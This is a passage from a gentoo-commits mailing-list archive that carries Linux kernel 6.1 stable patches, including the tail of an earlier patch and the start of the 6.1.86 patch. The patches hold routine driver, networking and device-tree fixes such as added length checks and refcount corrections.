+@@ -966,6 +966,8 @@ static int do_replace(struct net *net, sockptr_t arg, unsigned int len)
+ 		return -ENOMEM;
+ 	if (tmp.num_counters == 0)
+ 		return -EINVAL;
++	if ((u64)len < (u64)tmp.size + sizeof(tmp))
++		return -EINVAL;
+ 
+ 	tmp.name[sizeof(tmp.name)-1] = 0;
+ 
+@@ -1266,6 +1268,8 @@ static int compat_do_replace(struct net *net, sockptr_t arg, unsigned int len)
+ 		return -ENOMEM;
+ 	if (tmp.num_counters == 0)
+ 		return -EINVAL;
++	if ((u64)len < (u64)tmp.size + sizeof(tmp))
++		return -EINVAL;
+ 
+ 	tmp.name[sizeof(tmp.name)-1] = 0;
+ 
+diff --git a/net/ipv4/netfilter/ip_tables.c b/net/ipv4/netfilter/ip_tables.c
+index 1f365e28e316c..a6208efcfccfc 100644
+--- a/net/ipv4/netfilter/ip_tables.c
++++ b/net/ipv4/netfilter/ip_tables.c
+@@ -1120,6 +1120,8 @@ do_replace(struct net *net, sockptr_t arg, unsigned int len)
+ 		return -ENOMEM;
+ 	if (tmp.num_counters == 0)
+ 		return -EINVAL;
++	if ((u64)len < (u64)tmp.size + sizeof(tmp))
++		return -EINVAL;
+ 
+ 	tmp.name[sizeof(tmp.name)-1] = 0;
+ 
+@@ -1506,6 +1508,8 @@ compat_do_replace(struct net *net, sockptr_t arg, unsigned int len)
+ 		return -ENOMEM;
+ 	if (tmp.num_counters == 0)
+ 		return -EINVAL;
++	if ((u64)len < (u64)tmp.size + sizeof(tmp))
++		return -EINVAL;
+ 
+ 	tmp.name[sizeof(tmp.name)-1] = 0;
+ 
+diff --git a/net/ipv4/route.c b/net/ipv4/route.c
+index 474f391fab35d..a0c687ff25987 100644
+--- a/net/ipv4/route.c
++++ b/net/ipv4/route.c
+@@ -926,13 +926,11 @@ void ip_rt_send_redirect(struct sk_buff *skb)
+ 		icmp_send(skb, ICMP_REDIRECT, ICMP_REDIR_HOST, gw);
+ 		peer->rate_last = jiffies;
+ 		++peer->n_redirects;
+-#ifdef CONFIG_IP_ROUTE_VERBOSE
+-		if (log_martians &&
++		if (IS_ENABLED(CONFIG_IP_ROUTE_VERBOSE) && log_martians &&
+ 		    peer->n_redirects == ip_rt_redirect_number)
+ 			net_warn_ratelimited("host %pI4/if%d ignores redirects for %pI4 to %pI4\n",
+ 					     &ip_hdr(skb)->saddr, inet_iif(skb),
+ 					     &ip_hdr(skb)->daddr, &gw);
+-#endif
+ 	}
+ out_put_peer:
+ 	inet_putpeer(peer);
+diff --git a/net/ipv6/addrconf.c b/net/ipv6/addrconf.c
+index 1648373692a99..3866deaadbb66 100644
+--- a/net/ipv6/addrconf.c
++++ b/net/ipv6/addrconf.c
+@@ -2050,9 +2050,10 @@ struct inet6_ifaddr *ipv6_get_ifaddr(struct net *net, const struct in6_addr *add
+ 		if (ipv6_addr_equal(&ifp->addr, addr)) {
+ 			if (!dev || ifp->idev->dev == dev ||
+ 			    !(ifp->scope&(IFA_LINK|IFA_HOST) || strict)) {
+-				result = ifp;
+-				in6_ifa_hold(ifp);
+-				break;
++				if (in6_ifa_hold_safe(ifp)) {
++					result = ifp;
++					break;
++				}
+ 			}
+ 		}
+ 	}
+diff --git a/net/ipv6/ip6_fib.c b/net/ipv6/ip6_fib.c
+index e606374854ce5..8213626434b91 100644
+--- a/net/ipv6/ip6_fib.c
++++ b/net/ipv6/ip6_fib.c
+@@ -1376,7 +1376,10 @@ int fib6_add(struct fib6_node *root, struct fib6_info *rt,
+ 	     struct nl_info *info, struct netlink_ext_ack *extack)
+ {
+ 	struct fib6_table *table = rt->fib6_table;
+-	struct fib6_node *fn, *pn = NULL;
++	struct fib6_node *fn;
++#ifdef CONFIG_IPV6_SUBTREES
++	struct fib6_node *pn = NULL;
++#endif
+ 	int err = -ENOMEM;
+ 	int allow_create = 1;
+ 	int replace_required = 0;
+@@ -1400,9 +1403,9 @@ int fib6_add(struct fib6_node *root, struct fib6_info *rt,
+ 		goto out;
+ 	}
+ 
++#ifdef CONFIG_IPV6_SUBTREES
+ 	pn = fn;
+ 
+-#ifdef CONFIG_IPV6_SUBTREES
+ 	if (rt->fib6_src.plen) {
+ 		struct fib6_node *sn;
+ 
+diff --git a/net/ipv6/netfilter/ip6_tables.c b/net/ipv6/netfilter/ip6_tables.c
+index 37a2b3301e423..b844e519da1b4 100644
+--- a/net/ipv6/netfilter/ip6_tables.c
++++ b/net/ipv6/netfilter/ip6_tables.c
+@@ -1137,6 +1137,8 @@ do_replace(struct net *net, sockptr_t arg, unsigned int len)
+ 		return -ENOMEM;
+ 	if (tmp.num_counters == 0)
+ 		return -EINVAL;
++	if ((u64)len < (u64)tmp.size + sizeof(tmp))
++		return -EINVAL;
+ 
+ 	tmp.name[sizeof(tmp.name)-1] = 0;
+ 
+@@ -1515,6 +1517,8 @@ compat_do_replace(struct net *net, sockptr_t arg, unsigned int len)
+ 		return -ENOMEM;
+ 	if (tmp.num_counters == 0)
+ 		return -EINVAL;
++	if ((u64)len < (u64)tmp.size + sizeof(tmp))
++		return -EINVAL;
+ 
+ 	tmp.name[sizeof(tmp.name)-1] = 0;
+ 
+diff --git a/net/openvswitch/conntrack.c b/net/openvswitch/conntrack.c
+index 0591cfb289d50..e4ba86b84b9b1 100644
+--- a/net/openvswitch/conntrack.c
++++ b/net/openvswitch/conntrack.c
+@@ -1711,8 +1711,9 @@ int ovs_ct_copy_action(struct net *net, const struct nlattr *attr,
+ 	if (ct_info.timeout[0]) {
+ 		if (nf_ct_set_timeout(net, ct_info.ct, family, key->ip.proto,
+ 				      ct_info.timeout))
+-			pr_info_ratelimited("Failed to associated timeout "
+-					    "policy `%s'\n", ct_info.timeout);
++			OVS_NLERR(log,
++				  "Failed to associated timeout policy '%s'",
++				  ct_info.timeout);
+ 		else
+ 			ct_info.nf_ct_timeout = rcu_dereference(
+ 				nf_ct_timeout_find(ct_info.ct)->timeout);
+diff --git a/net/unix/af_unix.c b/net/unix/af_unix.c
+index e1af94393789f..0a75d76535f75 100644
+--- a/net/unix/af_unix.c
++++ b/net/unix/af_unix.c
+@@ -968,11 +968,11 @@ static struct sock *unix_create1(struct net *net, struct socket *sock, int kern,
+ 	sk->sk_write_space	= unix_write_space;
+ 	sk->sk_max_ack_backlog	= net->unx.sysctl_max_dgram_qlen;
+ 	sk->sk_destruct		= unix_sock_destructor;
+-	u	  = unix_sk(sk);
++	u = unix_sk(sk);
++	u->inflight = 0;
+ 	u->path.dentry = NULL;
+ 	u->path.mnt = NULL;
+ 	spin_lock_init(&u->lock);
+-	atomic_long_set(&u->inflight, 0);
+ 	INIT_LIST_HEAD(&u->link);
+ 	mutex_init(&u->iolock); /* single task reading lock */
+ 	mutex_init(&u->bindlock); /* single task binding lock */
+@@ -2677,7 +2677,9 @@ static struct sk_buff *manage_oob(struct sk_buff *skb, struct sock *sk,
+ 				}
+ 			} else if (!(flags & MSG_PEEK)) {
+ 				skb_unlink(skb, &sk->sk_receive_queue);
+-				consume_skb(skb);
++				WRITE_ONCE(u->oob_skb, NULL);
++				if (!WARN_ON_ONCE(skb_unref(skb)))
++					kfree_skb(skb);
+ 				skb = skb_peek(&sk->sk_receive_queue);
+ 			}
+ 		}
+diff --git a/net/unix/garbage.c b/net/unix/garbage.c
+index 9bfffe2a7f020..85c6f05c0fa3c 100644
+--- a/net/unix/garbage.c
++++ b/net/unix/garbage.c
+@@ -166,17 +166,18 @@ static void scan_children(struct sock *x, void (*func)(struct unix_sock *),
+ 
+ static void dec_inflight(struct unix_sock *usk)
+ {
+-	atomic_long_dec(&usk->inflight);
++	usk->inflight--;
+ }
+ 
+ static void inc_inflight(struct unix_sock *usk)
+ {
+-	atomic_long_inc(&usk->inflight);
++	usk->inflight++;
+ }
+ 
+ static void inc_inflight_move_tail(struct unix_sock *u)
+ {
+-	atomic_long_inc(&u->inflight);
++	u->inflight++;
++
+ 	/* If this still might be part of a cycle, move it to the end
+ 	 * of the list, so that it's checked even if it was already
+ 	 * passed over
+@@ -234,20 +235,34 @@ void unix_gc(void)
+ 	 * receive queues.  Other, non candidate sockets _can_ be
+ 	 * added to queue, so we must make sure only to touch
+ 	 * candidates.
++	 *
++	 * Embryos, though never candidates themselves, affect which
++	 * candidates are reachable by the garbage collector.  Before
++	 * being added to a listener's queue, an embryo may already
++	 * receive data carrying SCM_RIGHTS, potentially making the
++	 * passed socket a candidate that is not yet reachable by the
++	 * collector.  It becomes reachable once the embryo is
++	 * enqueued.  Therefore, we must ensure that no SCM-laden
++	 * embryo appears in a (candidate) listener's queue between
++	 * consecutive scan_children() calls.
+ 	 */
+ 	list_for_each_entry_safe(u, next, &gc_inflight_list, link) {
++		struct sock *sk = &u->sk;
+ 		long total_refs;
+-		long inflight_refs;
+ 
+-		total_refs = file_count(u->sk.sk_socket->file);
+-		inflight_refs = atomic_long_read(&u->inflight);
++		total_refs = file_count(sk->sk_socket->file);
+ 
+-		BUG_ON(inflight_refs < 1);
+-		BUG_ON(total_refs < inflight_refs);
+-		if (total_refs == inflight_refs) {
++		BUG_ON(!u->inflight);
++		BUG_ON(total_refs < u->inflight);
++		if (total_refs == u->inflight) {
+ 			list_move_tail(&u->link, &gc_candidates);
+ 			__set_bit(UNIX_GC_CANDIDATE, &u->gc_flags);
+ 			__set_bit(UNIX_GC_MAYBE_CYCLE, &u->gc_flags);
++
++			if (sk->sk_state == TCP_LISTEN) {
++				unix_state_lock(sk);
++				unix_state_unlock(sk);
++			}
+ 		}
+ 	}
+ 
+@@ -271,7 +286,7 @@ void unix_gc(void)
+ 		/* Move cursor to after the current position. */
+ 		list_move(&cursor, &u->link);
+ 
+-		if (atomic_long_read(&u->inflight) > 0) {
++		if (u->inflight) {
+ 			list_move_tail(&u->link, &not_cycle_list);
+ 			__clear_bit(UNIX_GC_MAYBE_CYCLE, &u->gc_flags);
+ 			scan_children(&u->sk, inc_inflight_move_tail, NULL);
+diff --git a/net/unix/scm.c b/net/unix/scm.c
+index d1048b4c2baaf..4eff7da9f6f96 100644
+--- a/net/unix/scm.c
++++ b/net/unix/scm.c
+@@ -52,12 +52,13 @@ void unix_inflight(struct user_struct *user, struct file *fp)
+ 	if (s) {
+ 		struct unix_sock *u = unix_sk(s);
+ 
+-		if (atomic_long_inc_return(&u->inflight) == 1) {
++		if (!u->inflight) {
+ 			BUG_ON(!list_empty(&u->link));
+ 			list_add_tail(&u->link, &gc_inflight_list);
+ 		} else {
+ 			BUG_ON(list_empty(&u->link));
+ 		}
++		u->inflight++;
+ 		/* Paired with READ_ONCE() in wait_for_unix_gc() */
+ 		WRITE_ONCE(unix_tot_inflight, unix_tot_inflight + 1);
+ 	}
+@@ -74,10 +75,11 @@ void unix_notinflight(struct user_struct *user, struct file *fp)
+ 	if (s) {
+ 		struct unix_sock *u = unix_sk(s);
+ 
+-		BUG_ON(!atomic_long_read(&u->inflight));
++		BUG_ON(!u->inflight);
+ 		BUG_ON(list_empty(&u->link));
+ 
+-		if (atomic_long_dec_and_test(&u->inflight))
++		u->inflight--;
++		if (!u->inflight)
+ 			list_del_init(&u->link);
+ 		/* Paired with READ_ONCE() in wait_for_unix_gc() */
+ 		WRITE_ONCE(unix_tot_inflight, unix_tot_inflight - 1);
+diff --git a/net/xdp/xsk.c b/net/xdp/xsk.c
+index 5c8e02d56fd43..e3bdfc517424d 100644
+--- a/net/xdp/xsk.c
++++ b/net/xdp/xsk.c
+@@ -1127,6 +1127,8 @@ static int xsk_setsockopt(struct socket *sock, int level, int optname,
+ 		struct xsk_queue **q;
+ 		int entries;
+ 
++		if (optlen < sizeof(entries))
++			return -EINVAL;
+ 		if (copy_from_sockptr(&entries, optval, sizeof(entries)))
+ 			return -EFAULT;
+ 
+diff --git a/tools/testing/selftests/timers/posix_timers.c b/tools/testing/selftests/timers/posix_timers.c
+index 0ba500056e635..193a984f512c3 100644
+--- a/tools/testing/selftests/timers/posix_timers.c
++++ b/tools/testing/selftests/timers/posix_timers.c
+@@ -66,7 +66,7 @@ static int check_diff(struct timeval start, struct timeval end)
+ 	diff = end.tv_usec - start.tv_usec;
+ 	diff += (end.tv_sec - start.tv_sec) * USECS_PER_SEC;
+ 
+-	if (abs(diff - DELAY * USECS_PER_SEC) > USECS_PER_SEC / 2) {
++	if (llabs(diff - DELAY * USECS_PER_SEC) > USECS_PER_SEC / 2) {
+ 		printf("Diff too high: %lld..", diff);
+ 		return -1;
+ 	}


^ permalink raw reply related	[flat|nested] 161+ messages in thread
* [gentoo-commits] proj/linux-patches:6.1 commit in: /
@ 2024-04-13 13:07 Mike Pagano
  0 siblings, 0 replies; 161+ messages in thread
From: Mike Pagano @ 2024-04-13 13:07 UTC (permalink / raw
  To: gentoo-commits

commit:     98e85977046ab355bf2f834605abd83404ffc4ad
Author:     Mike Pagano <mpagano <AT> gentoo <DOT> org>
AuthorDate: Sat Apr 13 13:07:07 2024 +0000
Commit:     Mike Pagano <mpagano <AT> gentoo <DOT> org>
CommitDate: Sat Apr 13 13:07:07 2024 +0000
URL:        https://gitweb.gentoo.org/proj/linux-patches.git/commit/?id=98e85977

Linux patch 6.1.86

Signed-off-by: Mike Pagano <mpagano <AT> gentoo.org>

 0000_README             |    4 +
 1085_linux-6.1.86.patch | 2257 +++++++++++++++++++++++++++++++++++++++++++++++
 2 files changed, 2261 insertions(+)

diff --git a/0000_README b/0000_README
index beb8ee68..d1148845 100644
--- a/0000_README
+++ b/0000_README
@@ -383,6 +383,10 @@ Patch:  1084_linux-6.1.85.patch
 From:   https://www.kernel.org
 Desc:   Linux 6.1.85
 
+Patch:  1085_linux-6.1.86.patch
+From:   https://www.kernel.org
+Desc:   Linux 6.1.86
+
 Patch:  1500_XATTR_USER_PREFIX.patch
 From:   https://bugs.gentoo.org/show_bug.cgi?id=470644
 Desc:   Support for namespace user.pax.* on tmpfs.

diff --git a/1085_linux-6.1.86.patch b/1085_linux-6.1.86.patch
new file mode 100644
index 00000000..64dcadfd
--- /dev/null
+++ b/1085_linux-6.1.86.patch
@@ -0,0 +1,2257 @@
+diff --git a/Makefile b/Makefile
+index 5dff9ff999981..baddd8ed81868 100644
+--- a/Makefile
++++ b/Makefile
+@@ -1,7 +1,7 @@
+ # SPDX-License-Identifier: GPL-2.0
+ VERSION = 6
+ PATCHLEVEL = 1
+-SUBLEVEL = 85
++SUBLEVEL = 86
+ EXTRAVERSION =
+ NAME = Curry Ramen
+ 
+diff --git a/arch/arm64/boot/dts/rockchip/rk3328.dtsi b/arch/arm64/boot/dts/rockchip/rk3328.dtsi
+index 905a50aa5dc38..d42846efff2fe 100644
+--- a/arch/arm64/boot/dts/rockchip/rk3328.dtsi
++++ b/arch/arm64/boot/dts/rockchip/rk3328.dtsi
+@@ -741,11 +741,20 @@ hdmi: hdmi@ff3c0000 {
+ 		status = "disabled";
+ 
+ 		ports {
+-			hdmi_in: port {
++			#address-cells = <1>;
++			#size-cells = <0>;
++
++			hdmi_in: port@0 {
++				reg = <0>;
++
+ 				hdmi_in_vop: endpoint {
+ 					remote-endpoint = <&vop_out_hdmi>;
+ 				};
+ 			};
++
++			hdmi_out: port@1 {
++				reg = <1>;
++			};
+ 		};
+ 	};
+ 
+diff --git a/arch/arm64/boot/dts/rockchip/rk3399.dtsi b/arch/arm64/boot/dts/rockchip/rk3399.dtsi
+index a7e6eccb14cc6..8363cc13ec517 100644
+--- a/arch/arm64/boot/dts/rockchip/rk3399.dtsi
++++ b/arch/arm64/boot/dts/rockchip/rk3399.dtsi
+@@ -1906,6 +1906,7 @@ simple-audio-card,codec {
+ 	hdmi: hdmi@ff940000 {
+ 		compatible = "rockchip,rk3399-dw-hdmi";
+ 		reg = <0x0 0xff940000 0x0 0x20000>;
++		reg-io-width = <4>;
+ 		interrupts = <GIC_SPI 23 IRQ_TYPE_LEVEL_HIGH 0>;
+ 		clocks = <&cru PCLK_HDMI_CTRL>,
+ 			 <&cru SCLK_HDMI_SFR>,
+@@ -1914,13 +1915,16 @@ hdmi: hdmi@ff940000 {
+ 			 <&cru PLL_VPLL>;
+ 		clock-names = "iahb", "isfr", "cec", "grf", "ref";
+ 		power-domains = <&power RK3399_PD_HDCP>;
+-		reg-io-width = <4>;
+ 		rockchip,grf = <&grf>;
+ 		#sound-dai-cells = <0>;
+ 		status = "disabled";
+ 
+ 		ports {
+-			hdmi_in: port {
++			#address-cells = <1>;
++			#size-cells = <0>;
++
++			hdmi_in: port@0 {
++				reg = <0>;
+ 				#address-cells = <1>;
+ 				#size-cells = <0>;
+ 
+@@ -1933,6 +1937,10 @@ hdmi_in_vopl: endpoint@1 {
+ 					remote-endpoint = <&vopl_out_hdmi>;
+ 				};
+ 			};
++
++			hdmi_out: port@1 {
++				reg = <1>;
++			};
+ 		};
+ 	};
+ 
+diff --git a/arch/x86/events/amd/lbr.c b/arch/x86/events/amd/lbr.c
+index b8fe74e8e0a60..48f4095f500d4 100644
+--- a/arch/x86/events/amd/lbr.c
++++ b/arch/x86/events/amd/lbr.c
+@@ -173,9 +173,11 @@ void amd_pmu_lbr_read(void)
+ 
+ 		/*
+ 		 * Check if a branch has been logged; if valid = 0, spec = 0
+-		 * then no branch was recorded
++		 * then no branch was recorded; if reserved = 1 then an
++		 * erroneous branch was recorded (see Erratum 1452)
+ 		 */
+-		if (!entry.to.split.valid && !entry.to.split.spec)
++		if ((!entry.to.split.valid && !entry.to.split.spec) ||
++		    entry.to.split.reserved)
+ 			continue;
+ 
+ 		perf_clear_branch_entry_bitfields(br + out);
+diff --git a/block/blk-stat.c b/block/blk-stat.c
+index da9407b7d4abf..41be89ecaf20e 100644
+--- a/block/blk-stat.c
++++ b/block/blk-stat.c
+@@ -28,7 +28,7 @@ void blk_rq_stat_init(struct blk_rq_stat *stat)
+ /* src is a per-cpu stat, mean isn't initialized */
+ void blk_rq_stat_sum(struct blk_rq_stat *dst, struct blk_rq_stat *src)
+ {
+-	if (!src->nr_samples)
++	if (dst->nr_samples + src->nr_samples <= dst->nr_samples)
+ 		return;
+ 
+ 	dst->min = min(dst->min, src->min);
+diff --git a/drivers/acpi/sleep.c b/drivers/acpi/sleep.c
+index 539c12fbd2f14..6026e20f022a2 100644
+--- a/drivers/acpi/sleep.c
++++ b/drivers/acpi/sleep.c
+@@ -385,18 +385,6 @@ static const struct dmi_system_id acpisleep_dmi_table[] __initconst = {
+ 		DMI_MATCH(DMI_PRODUCT_NAME, "20GGA00L00"),
+ 		},
+ 	},
+-	/*
+-	 * ASUS B1400CEAE hangs on resume from suspend (see
+-	 * https://bugzilla.kernel.org/show_bug.cgi?id=215742).
+-	 */
+-	{
+-	.callback = init_default_s3,
+-	.ident = "ASUS B1400CEAE",
+-	.matches = {
+-		DMI_MATCH(DMI_SYS_VENDOR, "ASUSTeK COMPUTER INC."),
+-		DMI_MATCH(DMI_PRODUCT_NAME, "ASUS EXPERTBOOK B1400CEAE"),
+-		},
+-	},
+ 	{},
+ };
+ 
+diff --git a/drivers/bluetooth/btintel.c b/drivers/bluetooth/btintel.c
+index bbad1207cdfd8..7a9d2da3c8146 100644
+--- a/drivers/bluetooth/btintel.c
++++ b/drivers/bluetooth/btintel.c
+@@ -411,7 +411,7 @@ int btintel_read_version(struct hci_dev *hdev, struct intel_version *ver)
+ 		return PTR_ERR(skb);
+ 	}
+ 
+-	if (skb->len != sizeof(*ver)) {
++	if (!skb || skb->len != sizeof(*ver)) {
+ 		bt_dev_err(hdev, "Intel version event size mismatch");
+ 		kfree_skb(skb);
+ 		return -EILSEQ;
+diff --git a/drivers/bluetooth/btmtk.c b/drivers/bluetooth/btmtk.c
+index 809762d64fc65..b77e337778a44 100644
+--- a/drivers/bluetooth/btmtk.c
++++ b/drivers/bluetooth/btmtk.c
+@@ -288,4 +288,5 @@ MODULE_LICENSE("GPL");
+ MODULE_FIRMWARE(FIRMWARE_MT7622);
+ MODULE_FIRMWARE(FIRMWARE_MT7663);
+ MODULE_FIRMWARE(FIRMWARE_MT7668);
++MODULE_FIRMWARE(FIRMWARE_MT7922);
+ MODULE_FIRMWARE(FIRMWARE_MT7961);
+diff --git a/drivers/bluetooth/btmtk.h b/drivers/bluetooth/btmtk.h
+index 2a88ea8e475e8..ee0b1d27aa5c0 100644
+--- a/drivers/bluetooth/btmtk.h
++++ b/drivers/bluetooth/btmtk.h
+@@ -4,6 +4,7 @@
+ #define FIRMWARE_MT7622		"mediatek/mt7622pr2h.bin"
+ #define FIRMWARE_MT7663		"mediatek/mt7663pr2h.bin"
+ #define FIRMWARE_MT7668		"mediatek/mt7668pr2h.bin"
++#define FIRMWARE_MT7922		"mediatek/BT_RAM_CODE_MT7922_1_1_hdr.bin"
+ #define FIRMWARE_MT7961		"mediatek/BT_RAM_CODE_MT7961_1_2_hdr.bin"
+ 
+ #define HCI_EV_WMT 0xe4
+diff --git a/drivers/bus/mhi/host/init.c b/drivers/bus/mhi/host/init.c
+index 04fbccff65ac2..60c1df048fa20 100644
+--- a/drivers/bus/mhi/host/init.c
++++ b/drivers/bus/mhi/host/init.c
+@@ -62,6 +62,7 @@ static const char * const mhi_pm_state_str[] = {
+ 	[MHI_PM_STATE_FW_DL_ERR] = "Firmware Download Error",
+ 	[MHI_PM_STATE_SYS_ERR_DETECT] = "SYS ERROR Detect",
+ 	[MHI_PM_STATE_SYS_ERR_PROCESS] = "SYS ERROR Process",
++	[MHI_PM_STATE_SYS_ERR_FAIL] = "SYS ERROR Failure",
+ 	[MHI_PM_STATE_SHUTDOWN_PROCESS] = "SHUTDOWN Process",
+ 	[MHI_PM_STATE_LD_ERR_FATAL_DETECT] = "Linkdown or Error Fatal Detect",
+ };
+diff --git a/drivers/bus/mhi/host/internal.h b/drivers/bus/mhi/host/internal.h
+index 01fd10a399b61..6abf09da4f618 100644
+--- a/drivers/bus/mhi/host/internal.h
++++ b/drivers/bus/mhi/host/internal.h
+@@ -88,6 +88,7 @@ enum mhi_pm_state {
+ 	MHI_PM_STATE_FW_DL_ERR,
+ 	MHI_PM_STATE_SYS_ERR_DETECT,
+ 	MHI_PM_STATE_SYS_ERR_PROCESS,
++	MHI_PM_STATE_SYS_ERR_FAIL,
+ 	MHI_PM_STATE_SHUTDOWN_PROCESS,
+ 	MHI_PM_STATE_LD_ERR_FATAL_DETECT,
+ 	MHI_PM_STATE_MAX
+@@ -104,14 +105,16 @@ enum mhi_pm_state {
+ #define MHI_PM_FW_DL_ERR				BIT(7)
+ #define MHI_PM_SYS_ERR_DETECT				BIT(8)
+ #define MHI_PM_SYS_ERR_PROCESS				BIT(9)
+-#define MHI_PM_SHUTDOWN_PROCESS				BIT(10)
++#define MHI_PM_SYS_ERR_FAIL				BIT(10)
++#define MHI_PM_SHUTDOWN_PROCESS				BIT(11)
+ /* link not accessible */
+-#define MHI_PM_LD_ERR_FATAL_DETECT			BIT(11)
++#define MHI_PM_LD_ERR_FATAL_DETECT			BIT(12)
+ 
+ #define MHI_REG_ACCESS_VALID(pm_state)			((pm_state & (MHI_PM_POR | MHI_PM_M0 | \
+ 						MHI_PM_M2 | MHI_PM_M3_ENTER | MHI_PM_M3_EXIT | \
+ 						MHI_PM_SYS_ERR_DETECT | MHI_PM_SYS_ERR_PROCESS | \
+-						MHI_PM_SHUTDOWN_PROCESS | MHI_PM_FW_DL_ERR)))
++						MHI_PM_SYS_ERR_FAIL | MHI_PM_SHUTDOWN_PROCESS |  \
++						MHI_PM_FW_DL_ERR)))
+ #define MHI_PM_IN_ERROR_STATE(pm_state)			(pm_state >= MHI_PM_FW_DL_ERR)
+ #define MHI_PM_IN_FATAL_STATE(pm_state)			(pm_state == MHI_PM_LD_ERR_FATAL_DETECT)
+ #define MHI_DB_ACCESS_VALID(mhi_cntrl)			(mhi_cntrl->pm_state & mhi_cntrl->db_access)
+diff --git a/drivers/bus/mhi/host/pm.c b/drivers/bus/mhi/host/pm.c
+index 8a4362d75fc43..27f8a40f288cf 100644
+--- a/drivers/bus/mhi/host/pm.c
++++ b/drivers/bus/mhi/host/pm.c
+@@ -36,7 +36,10 @@
+  *     M0 <--> M0
+  *     M0 -> FW_DL_ERR
+  *     M0 -> M3_ENTER -> M3 -> M3_EXIT --> M0
+- * L1: SYS_ERR_DETECT -> SYS_ERR_PROCESS --> POR
++ * L1: SYS_ERR_DETECT -> SYS_ERR_PROCESS
++ *     SYS_ERR_PROCESS -> SYS_ERR_FAIL
++ *     SYS_ERR_FAIL -> SYS_ERR_DETECT
++ *     SYS_ERR_PROCESS --> POR
+  * L2: SHUTDOWN_PROCESS -> LD_ERR_FATAL_DETECT
+  *     SHUTDOWN_PROCESS -> DISABLE
+  * L3: LD_ERR_FATAL_DETECT <--> LD_ERR_FATAL_DETECT
+@@ -93,7 +96,12 @@ static const struct mhi_pm_transitions dev_state_transitions[] = {
+ 	},
+ 	{
+ 		MHI_PM_SYS_ERR_PROCESS,
+-		MHI_PM_POR | MHI_PM_SHUTDOWN_PROCESS |
++		MHI_PM_POR | MHI_PM_SYS_ERR_FAIL | MHI_PM_SHUTDOWN_PROCESS |
++		MHI_PM_LD_ERR_FATAL_DETECT
++	},
++	{
++		MHI_PM_SYS_ERR_FAIL,
++		MHI_PM_SYS_ERR_DETECT | MHI_PM_SHUTDOWN_PROCESS |
+ 		MHI_PM_LD_ERR_FATAL_DETECT
+ 	},
+ 	/* L2 States */
+@@ -624,7 +632,13 @@ static void mhi_pm_sys_error_transition(struct mhi_controller *mhi_cntrl)
+ 					!in_reset, timeout);
+ 		if (!ret || in_reset) {
+ 			dev_err(dev, "Device failed to exit MHI Reset state\n");
+-			goto exit_sys_error_transition;
++			write_lock_irq(&mhi_cntrl->pm_lock);
++			cur_state = mhi_tryset_pm_state(mhi_cntrl,
++							MHI_PM_SYS_ERR_FAIL);
++			write_unlock_irq(&mhi_cntrl->pm_lock);
++			/* Shutdown may have occurred, otherwise cleanup now */
++			if (cur_state != MHI_PM_SYS_ERR_FAIL)
++				goto exit_sys_error_transition;
+ 		}
+ 
+ 		/*
+diff --git a/drivers/cpufreq/cpufreq.c b/drivers/cpufreq/cpufreq.c
+index c8912756fc06d..91efa23e0e8f3 100644
+--- a/drivers/cpufreq/cpufreq.c
++++ b/drivers/cpufreq/cpufreq.c
+@@ -1525,7 +1525,8 @@ static int cpufreq_online(unsigned int cpu)
+ 	if (cpufreq_driver->ready)
+ 		cpufreq_driver->ready(policy);
+ 
+-	if (cpufreq_thermal_control_enabled(cpufreq_driver))
++	/* Register cpufreq cooling only for a new policy */
++	if (new_policy && cpufreq_thermal_control_enabled(cpufreq_driver))
+ 		policy->cdev = of_cpufreq_cooling_register(policy);
+ 
+ 	pr_debug("initialization complete\n");
+@@ -1609,11 +1610,6 @@ static void __cpufreq_offline(unsigned int cpu, struct cpufreq_policy *policy)
+ 	else
+ 		policy->last_policy = policy->policy;
+ 
+-	if (cpufreq_thermal_control_enabled(cpufreq_driver)) {
+-		cpufreq_cooling_unregister(policy->cdev);
+-		policy->cdev = NULL;
+-	}
+-
+ 	if (has_target())
+ 		cpufreq_exit_governor(policy);
+ 
+@@ -1674,6 +1670,15 @@ static void cpufreq_remove_dev(struct device *dev, struct subsys_interface *sif)
+ 		return;
+ 	}
+ 
++	/*
++	 * Unregister cpufreq cooling once all the CPUs of the policy are
++	 * removed.
++	 */
++	if (cpufreq_thermal_control_enabled(cpufreq_driver)) {
++		cpufreq_cooling_unregister(policy->cdev);
++		policy->cdev = NULL;
++	}
++
+ 	/* We did light-weight exit earlier, do full tear down now */
+ 	if (cpufreq_driver->offline)
+ 		cpufreq_driver->exit(policy);
+diff --git a/drivers/cpuidle/driver.c b/drivers/cpuidle/driver.c
+index f70aa17e2a8e0..c594e28adddf3 100644
+--- a/drivers/cpuidle/driver.c
++++ b/drivers/cpuidle/driver.c
+@@ -16,6 +16,7 @@
+ #include <linux/cpumask.h>
+ #include <linux/tick.h>
+ #include <linux/cpu.h>
++#include <linux/math64.h>
+ 
+ #include "cpuidle.h"
+ 
+@@ -185,7 +186,7 @@ static void __cpuidle_driver_init(struct cpuidle_driver *drv)
+ 			s->target_residency_ns = 0;
+ 
+ 		if (s->exit_latency > 0)
+-			s->exit_latency_ns = s->exit_latency * NSEC_PER_USEC;
++			s->exit_latency_ns = mul_u32_u32(s->exit_latency, NSEC_PER_USEC);
+ 		else if (s->exit_latency_ns < 0)
+ 			s->exit_latency_ns =  0;
+ 	}
+diff --git a/drivers/firmware/tegra/bpmp-debugfs.c b/drivers/firmware/tegra/bpmp-debugfs.c
+index 9d3874cdaaeef..34e4152477f3b 100644
+--- a/drivers/firmware/tegra/bpmp-debugfs.c
++++ b/drivers/firmware/tegra/bpmp-debugfs.c
+@@ -81,7 +81,7 @@ static const char *get_filename(struct tegra_bpmp *bpmp,
+ 
+ 	root_path_buf = kzalloc(root_path_buf_len, GFP_KERNEL);
+ 	if (!root_path_buf)
+-		goto out;
++		return NULL;
+ 
+ 	root_path = dentry_path(bpmp->debugfs_mirror, root_path_buf,
+ 				root_path_buf_len);
+diff --git a/drivers/gpu/drm/amd/amdkfd/kfd_chardev.c b/drivers/gpu/drm/amd/amdkfd/kfd_chardev.c
+index e191d38f3da62..3f403afd6de83 100644
+--- a/drivers/gpu/drm/amd/amdkfd/kfd_chardev.c
++++ b/drivers/gpu/drm/amd/amdkfd/kfd_chardev.c
+@@ -765,8 +765,8 @@ static int kfd_ioctl_get_process_apertures_new(struct file *filp,
+ 	 * nodes, but not more than args->num_of_nodes as that is
+ 	 * the amount of memory allocated by user
+ 	 */
+-	pa = kzalloc((sizeof(struct kfd_process_device_apertures) *
+-				args->num_of_nodes), GFP_KERNEL);
++	pa = kcalloc(args->num_of_nodes, sizeof(struct kfd_process_device_apertures),
++		     GFP_KERNEL);
+ 	if (!pa)
+ 		return -ENOMEM;
+ 
